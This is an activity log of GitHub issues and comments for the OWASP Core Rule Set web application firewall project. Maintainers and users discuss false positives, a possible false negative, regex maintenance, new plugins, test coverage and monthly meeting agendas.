[2021-10-05 09:17] yasuyuki-satake opened #2219 "XSS: WAF on Azure Application gateway"
### Describe the bug

We are using WAF rule (OWASP CRS 3.0) on Azure Application gateway.
But we face something wierd situation.
We got an answer from Microsoft support, they said I need to confirm this with you.
It seems below is affected a rule id = 941100 (XSS Attack Detected via libinjection) on it.

Do you have any comment or suggestion on this?

### Steps to reproduce
HTML
<img width="332" a

[2021-10-05 20:21] RedXanadu opened #2220 "Rule 920100 does not handle CONNECT requests correctly"
### Description

Issue originally reported on StackOverflow, [here](https://stackoverflow.com/questions/69434637/owasp-corerulet-warning-invalid-http-request-line-triggered-by-connect-method/).

Rule 920100 is designed to "Validate request line against the format specified in the HTTP RFC". It includes support for the HTTP `CONNECT` request method. Unfortunately, the rule only recognises a subset

[2021-10-05 20:41] dune73 commented on #2220
Wow, that was probably the most thorough response in the history of stack overflow. Thank you very much @RedXanadu.
Also for the writeup here.

[2021-10-05 23:54] yasuyuki-satake commented on #2219
Hi @RedXanadu

Thank you for your comment.

The below is an audit log on our Azure.
* domain is masked..

{ "resourceId": "/SUBSCRIPTIONS/0F1E0263-6464-44DD-9858-F81C8F3183DD/RESOURCEGROUPS/ADECCO-PROD-WESTJP/PROVIDERS/MICROSOFT.NETWORK/APPLICATIONGATEWAYS/AAAAA-PROD-WESTJP-AGW", "operationName": "ApplicationGatewayFirewall", "time": "2021-09-30T04:43:16.7067560Z", "category": "ApplicationGatewayF

[2021-10-06 06:35] dune73 opened #2221 "Disassemble regex in 930100"
The regex in 930100 is rather hard to read. It would be worthwhile to disassemble it and then generate it via script:

[code]

For the record: 930100 protects us from CVE-2021-41773, yet looking at the regex I can not readily see how.

[2021-10-06 06:59] franbuehler commented on #2221
Hi @dune73,
This seems to be a task for me??

[2021-10-06 07:03] dune73 commented on #2221
If you think that would be a fun adventure, then that would be most welcome. :)

[2021-10-06 15:48] theseion commented on #2221
@franbuehler would it make sense to write a script to simplify such expressions into palatable subexpressions? How do you usually decompose these?

[2021-10-06 19:41] franbuehler commented on #2221
The regex has probably been generated with Regexp::Assemble, but the problem is that the source is no avaliable anymore.
Therefore I disassembled all SQLi rules and wrote the source files/data files that we have today.
I did this manually because there were too many special cases or I was just not capable to write a script ;)

How I did this is written in this blog post here:
https://coreruleset.o

[2021-10-06 19:47] dune73 commented on #2221
CRS lore also has it that @franbuehler also received an admission into the ranks of the "International Academy for Advanced Regular Expression Wizardry" aka as `/^IA{2}REW$/` for this work.

[2021-10-06 22:22] RedXanadu commented on #2219
Thank you for that information.

Is there any additional information available about _which variable_ matched? For example, I was hoping to see a log line like the following:

`"data": "Matched Data: https://www.AAAAA.co.jp/lp/on_client3.html?a=a found within REQUEST_HEADERS:Referer: https://www.AAAAA.co.jp/lp/on_client3.html?a=a"`

Because the matched data is a full URL, I'm 90% sure that the `Re

[2021-10-07 00:23] yasuyuki-satake commented on #2219
Hi @RedXanadu

Thank you for your comment and suggestion.
We are using WAF rule (OWASP CRS 3.0) on Azure Application gateway.
it means I think we are running WAF at paranoia level 1.
But I can not see newer CRS version on Azure Application gateway which we are using..
I will check if we will use newer CRS version on Azure Application gateway.
Anyway, thank you for your kind help!

[2021-10-08 00:16] yasuyuki-satake commented on #2219
@RedXanadu
Thanks for your kindness.
As far as I checked, If we want to use CRS 3.1 on Azure Application gateway, we need to re-create Application gateway and attached it.
I will talk with my team if we could upgrade Application gateway, or take easy solution (disable rule 941100).
close with comment for now... thank you.

[2021-10-08 00:16] #2219 closed

[2021-10-08 10:11] azurit opened #2224 "Assign attack type to as much rules as possible"
### Motivation

For our customers, we are drawing pie graphs from CRS logs for attack types, as this one:
![pie](https://user-images.githubusercontent.com/1083063/136538211-a0d67ee1-8b72-49d9-ac21-0dd2c7b1078e.png)

I would like to get rid of `OTHER` i.e. uncategorized attacks, which use to be quite high (see image above).

### Proposed solution

There are two types of rules:

1. Attack type can b

[2021-10-08 10:17] azurit opened #2225 "Wrong attack type for rule 932180"
### Describe the bug

Rule ID `932180` has wrong attack type set or is in wrong file (`REQUEST-932-APPLICATION-ATTACK-RCE.conf`):

`setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}',\`

I'm really not sure if it's `RCE` or `LFI`. Maybe `RFI`? I can send a PR.

[2021-10-09 11:19] azurit commented on #2206
@NiceYouKnow Thank you very much for sharing your rule, we will definitely look at it! Anyway, it seems to be for IMAP, not SMTP.

[2021-10-09 11:24] NiceYouKnow commented on #2206
OK,that should be my mistake. I hope it can help.

[2021-10-09 16:21] fzipi commented on #2224
Sounds good. What about the CAPEC information we added? Is that relevant for you?

[2021-10-10 14:24] azurit opened #2227 "Fake Googlebot plugin"
### Motivation

As we all know, many bots are fakeing `User-Agent` header to look like a Googlebot. In lots of cases, users are trusting this header and, for example, are not applying so high restrictions for such requests. Anyway, behavior where anyone is fakeing anything to get something more is considered bad (or should be). This plugin is able to detect and block such requests.

### Proposed s

[2021-10-10 16:06] RedXanadu commented on #2220
Hi @MichaelJahn2, thanks for posting here!

In my opinion, the issue with rule 920100 is a specific shortcoming. The rule is advertised to "Validate request line[s] against the format specified in the HTTP RFC" and to "…[outline] proper construction for CONNECT… requests."

You've demonstrated that rule 920100 does not currently live up to its description, which is a specific bug we should address

[2021-10-10 18:59] RedXanadu commented on #2220
## Note

The **existing** regular expression for rule 920100 can be disassembled like so:

[code]

This should make rule 920100 much easier to maintain in the future.

This uses the new style regex assembling syntax, so this change can be made once #2223 is merged

[2021-10-10 19:58] #2211 closed

[2021-10-11 16:22] fzipi commented on #2209
@braianxde If you read the whole ticket you mentioned, you will see that the fix was merge to the branch `dev/3.1-experimental`, not the master v3 branch.

So nothing to do here. If you want to retest, please recompile your modsec v3 using that branch and test again.

[2021-10-12 13:52] azurit opened #2228 "Fake bot plugin"
### Motivation

As we all know, many bots are fakeing `User-Agent` header to look like a, i.e., Googlebot. In lots of cases, users are trusting this header and, for example, are not applying so high restrictions for such requests. Anyway, behavior where anyone is fakeing anything to get something more is considered bad (or should be). This plugin is able to detect and block such requests.

### Pro

[2021-10-14 07:56] christiantreutler-avi opened #2229 "Rule 942251 - Having - PL3"
### Description

Rule 942251 is causing very simple false positives with the **having** key word.
Especially since it does not have a word boundary \b like other rules with having.

Simple language like: **I like having a tea** is matching too
Or even **I like having123 tea**, which I saw triggered recently.

I understand that this rule in PL3, but even then I think this might be too generic.

###

[2021-10-15 02:46] NiceYouKnow opened #2230 "False negative in 942230"
### Describe the bug
This is the regularity of 942230:
[code]
It can be split into four independent rules:
[code]
My question is that there may be a risk of missing the attack on the fourth rule.

Below are two payloads of the same type:
[code]
You can check the test in https://regex101.com/r/h9Vz4I/2, the regular rule only hits the first payload, but not the second payload.

So my suggestion for

[2021-10-15 18:04] theMiddleBlue commented on #2228
wow, that's true... I didn't think about this kind of problem!

[code]

weird... why this happens?

[2021-10-15 18:09] lifeforms commented on #2230
I am just peering through this issue, but in MySQL, the syntax for the CASE operator is different. The example would be correct as:

[code]

However, I don't know how other SQL dialects allow CASE.

[2021-10-16 08:25] azurit opened #2232 "Google OAuth2 plugin"
### Motivation

Lots of users are reporting problems with Google OAuth2 callback requests as it's `scope` argument usually contains string `.profile`, which is triggering rule `930120`. We already proposed a solution for this (see PRs #1958 and #2222) but i don't think that our core ruleset should contain bypasses for specific software and services.

### Proposed solution

I suggest reworking this

[2021-10-16 15:11] theseion commented on #2221
That's great! Thanks @RedXanadu. With the extended assemble script we can use prefix and suffix markers to generate this.

[2021-10-17 08:56] flashultra opened #2233 "Always block .games domain"
### Description

The rules always block my domain name which  end with ".games"  .

### Audit Logs / Triggered Rule Numbers

---aHm3iwfx---F--
HTTP/2.0 403
Server: nginx
Date: Sun, 17 Oct 2021 07:41:08 GMT
Content-Length: 548
Content-Type: text/html
X-Content-Type-Options: nosniff
Connection: close
X-XSS-Protection: 1; mode=block
Referrer-Policy: no-referrer-when-downgrade
Content-Security-Policy:

[2021-10-17 10:39] flashultra commented on #2233
If this help, here is the full debug log  ( domain name is replaced with <my_site>.games )
 https://drive.google.com/file/d/1GWD9iQhJitg1J6QU4MU_51YZfsosDnb-/view?usp=sharing

[2021-10-17 12:46] theseion opened #2234 "Regular expression passed to regexp-cmdline.py"
The current regex of 932115 must have been altered by hand because the line `sort.*<` will not be properly escaped by the script, leading to an invalid expression (`...**...`) . I'm also not sure, looking at that line, whether it is supposed to escape `sort`, then match any character followed by `<`, which would make more sense to me than the literal `.*` (`.` will be escaped btw.). I think, the o

[2021-10-18 07:00] brentclark opened #2235 "Google Dorks List Collection for SQL Injection"
Good day and to whom it may concern

I came across this recent article and thought it may be of some help craft current and future issues

https://gbhackers.com/latest-google-sql-dorks/

Regards
Brent Clark

[2021-10-18 07:18] azurit commented on #2235
Hi @brentclark, thanks, we will take a look at it!

[2021-10-18 21:36] #2197 closed

[2021-10-19 20:16] dune73 opened #2239 "Monthly Chat Agenda November 2021 (2021-11-01 and 2021-11-15)"
This is the Agenda for the Monthly CRS Chat.

The general chat is going to happen on https://owasp.slack.com in the channel #coreruleset on Monday, 2021-11-01, at 20:30 CET. That's the 1st Monday of the month. A separate issue chat is happening at the same location, same time on Monday, 2021-01-15. That's the 3rd Monday of the month. Please note that we have a [CRS calendar](https://calendar.googl

[2021-10-19 20:24] #2235 closed, assigned to nobody

[2021-10-20 06:37] azurit opened #2240 "Idea: Adaptive paranoia level"
### Motivation

I was thinking about doing paranoia level some kind of adaptive to the request so, for example, if the IP address is suspicious, paranoia level will be automatically raised. On the other hand, PL can be lowered for known IPs.

Paranoia level can be changed based on these parameters:
 - remote IP address (fixed IPs, ranges, geoip, reputation, tor exit nodes)
 - RBL
 - score from pre

[2021-10-21 12:50] dune73 opened #2241 "Integrating CRS into Coraza WAF"
This is an issue / project scheduled for the [CRS developer summit](https://github.com/coreruleset/coreruleset/wiki/Dev-Retreat-Topics#project-topics) in October 2021. This is supposed to take several days.

There is a separate wiki page for this project: [DevRetreat21CorazaIntegration](https://github.com/coreruleset/coreruleset/wiki/DevRetreat21CorazaIntegration)

[2021-10-21 13:32] dune73 opened #2242 "Update Documentation"
This is an issue / project scheduled for the [CRS developer summit](https://github.com/coreruleset/coreruleset/wiki/Dev-Retreat-Topics#project-topics) in October 2021. This is supposed to take several days.

There is a separate wiki page for this project: [DevRetreat21UpdateDocumentation](https://github.com/coreruleset/coreruleset/wiki/DevRetreat21UpdateDocumentation)

[2021-10-21 13:32] dune73 opened #2243 "Write Technical Blog Posts"
This is an issue / project scheduled for the [CRS developer summit](https://github.com/coreruleset/coreruleset/wiki/Dev-Retreat-Topics#project-topics) in October 2021. This is supposed to take several days.

There is a separate wiki page for this project: [DevRetreat21WriteTechnicalBlogPosts](https://github.com/coreruleset/coreruleset/wiki/DevRetreat21WriteTechnicalBlogPosts)

[2021-10-21 13:33] dune73 opened #2244 "Demo Site"
This is an issue / project scheduled for the [CRS developer summit](https://github.com/coreruleset/coreruleset/wiki/Dev-Retreat-Topics#project-topics) in October 2021. This is supposed to take several days.

There is a separate wiki page for this project: [DevRetreat21DemoSite](https://github.com/coreruleset/coreruleset/wiki/DevRetreat21DemoSite)

[2021-10-21 13:33] dune73 opened #2245 "Status Page where existing commercial CRS offerings are tested and scored"
This is an issue / project scheduled for the [CRS developer summit](https://github.com/coreruleset/coreruleset/wiki/Dev-Retreat-Topics#project-topics) in October 2021. This is supposed to take several days.

There is a separate wiki page for this project: [DevRetreat21StatusPage](https://github.com/coreruleset/coreruleset/wiki/DevRetreat21StatusPage)

[2021-10-22 12:04] azurit opened #2246 "Plugins: Config file is not loaded before rules"
### Describe the bug

Config file must be always read/processed as first file as it is setting variables used by plugin rules. Our current plugin structure prevents this behavior (files are processed in alphabetical order):
[code]

Current plugins are working only thanks to the fact that config rule is run in phase 1 and all other rules in phase 2.

### Solutions

#### Add another include command

[2021-10-28 07:58] franbuehler opened #2256 "Write testcases for every rules so that we have a full coverage"
During the CRS Developer Summit we noticed that not all rules are covered with a test case. The following rules don't have at least one test.

Currently @airween and @franbuehler are writing test cases, but if anyone else wants to join in, here is the list and the status of the work.

Missing tests (tick means test exists now):

- [x] 913101 - @airween merged https://github.com/coreruleset/corerul

[2021-10-29 19:22] franbuehler commented on #2256
Yes, I tested it to be really sure:

docker-compose.yaml:

[code]
When I have a look at the crs-setup.conf in the container, the activate-rules.sh seems to have done its job properly:

[code]

I will open an issue to fix this missing documentation to the crs container.

[2021-11-01 16:30] airween commented on #2256
Thank you for your help, I think I able to create the PR.

[2021-11-01 17:36] RedXanadu commented on #2221
I'm not 100% sure the new regex script can completely replicate this regular expression. I think some new, additional comments will need to be written to accompany the rule.

I'll have a look at this later this week.

[2021-11-01 17:56] RedXanadu commented on #2170
This has now been resolved since PR #2208 was merged a few days ago.

@lifeforms: It was mentioned the other month that you may want to test this in production. (Summary: `REQUEST_FILENAME` added to rule 941101, at paranoia level 2, using the `detectXSS` operator. XSS attacks in filenames can now be caught at PL 2; added at PL2 to see how it behaves in practice as it has been suggested that this c

[2021-11-01 17:56] RedXanadu commented on #2170
Closing issue as resolved, unless there are any objections.

[2021-11-01 17:56] #2170 closed

[2021-11-01 17:57] RedXanadu commented on #2220
The new style regex assembling syntax isn't quite merge-ready yet, so this change will need to wait a bit longer.

[2021-11-01 18:08] theseion commented on #2221
You're probably right. I'm working on another preprocessor that should make that possible.

[2021-11-01 20:13] franbuehler commented on #2239
# Decisions

## PRs

* #2279 - @franbuehler will review it
* #2277 - @franbuehler will review it
* #2274
* #2258
* #2223
* #2222

## Open PRs related to issues 2256 (@2256)

* #2284
* #2267
* #2266
* #2265
* #2264

## Other items

## Issues

[2021-11-01 21:38] RedXanadu commented on #2242
The foundations have been laid for the new documentation system.

Most of the agreed-upon sections now exist, however a few still need to be created.

Some content needs to be moved. Much content still needs to be written. Much content needs to be checked and possibly reworked.

[2021-11-02 22:41] justinleemackey opened #2289 "Wordpress Directories Pro plugin false positive"
### Description

Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "91"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [ver "OWASP_CRS/3.3.2"] [tag "event-correlation"

[2021-11-03 08:03] dune73 commented on #2187
Thank you very much @theseion. Perfect to get me started. I've taken your drafts and expanded on https://github.com/coreruleset/coreruleset/wiki/Dev-on-Duty:-Response-Templates. Please check.

[2021-11-03 08:43] dune73 opened #2291 "Monthly Chat Agenda December 2021 (2021-12-06 and 2021-12-20)"
This is the Agenda for the Monthly CRS Chat.

The general chat is going to happen on https://owasp.slack.com in the channel #coreruleset on Monday, 2021-12-06, at 20:30 CET. That's the 1st Monday of the month. A separate issue chat is happening at the same location, same time on Monday, 2021-12-20. That's the 3rd Monday of the month. Please note that we have a [CRS calendar](https://calendar.googl

[2021-11-04 14:04] #2244 closed

[2021-11-04 14:04] #2243 closed

[2021-11-04 14:05] #2242 closed